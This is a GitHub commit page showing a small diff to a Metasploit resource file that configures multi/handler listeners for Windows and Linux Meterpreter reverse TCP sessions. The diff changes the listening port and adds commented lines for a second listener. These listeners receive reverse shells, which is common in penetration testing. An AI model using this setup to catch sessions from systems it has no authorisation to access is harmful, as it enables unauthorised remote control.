We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent d19f9e7 commit d6acae8Copy full SHA for d6acae8
.vscode/metasploit_handler.rc
@@ -7,9 +7,16 @@ setg payload windows/meterpreter/reverse_tcp
7
# setg RHOSTS 114.5.1.4
8
9
use multi/handler
10
+# set payload windows/meterpreter/reverse_tcp
11
set ExitOnSession false
12
set LHOST 0.0.0.0
-set LPORT 4443
13
+set LPORT 6789
14
+
15
+# uncomment this for Automatically creating a job listener background with multi listeners
16
+# run -j
17
+# set payload linux/x64/meterpreter/reverse_tcp
18
+# set LPORT 6790
19
+#
20
21
# uncomment this for Automatically creating a job listener background
22
# run -j
0 commit comments